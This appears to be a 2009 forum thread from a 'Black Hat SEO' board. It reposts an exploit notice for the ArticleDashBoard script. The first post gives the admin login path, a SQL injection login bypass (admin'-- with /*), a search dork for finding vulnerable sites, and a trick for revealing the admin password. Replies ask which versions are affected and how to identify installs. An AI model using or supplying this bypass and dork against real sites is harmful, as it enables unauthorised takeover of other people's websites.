SQL Injection Vulnerability Article DashBoard

Discussion in 'Black Hat SEO' started by omex, Jan 27, 2009.

  1. omex

    omex Regular Member

    Joined:
    Oct 10, 2007
    Messages:
    266
    Likes Received:
    155
    May be interesting..... :confused:


    ##########################################################################
    # ArticleDashBoard all version SQL Injection Vulnerability #
    # Homepage: http://articledashboard.com/ #
    # Download: http://www.articledashboard.com/addxpc/ArticleDashboard.zip #
    # SQL Injection Found by : #
    # ^ Xcross87 | xcross87.info | hcegroup.net #
    # Thanks to: ^ RongChauA | reaonline.net | rongchaua.net #
    # Dork : Powered by Article DashBoard #
    ##########################################################################


    SQL Injection Vulnerability :

    Link admin: http://www.victim.com/[path]/admin/login.php

    user | pass = admin'-- | /*

    Boomsssssss ! Top right corner.." Logged in as 'admin' "

    Note:
    + This source all is encrypted !
    + If admin setup mode: 'New Admin' , move mouse to the New Admin link you can see the password of the present admin account that you're logging in.

    [^$^] Enjoy !
     
  2. gimme4free

    gimme4free Executive VIP Premium Member

    Joined:
    Oct 22, 2008
    Messages:
    1,950
    Likes Received:
    1,949
    Thats pretty cool, so this works on which versions of AD?
     
  3. flow

    flow Regular Member

    Joined:
    Oct 3, 2008
    Messages:
    356
    Likes Received:
    111
    No hacking talk allowed unfortunately :(

    but while it's up... are there any footprints to identify an Article Dashboard install on a site?
     
    Last edited: Jan 27, 2009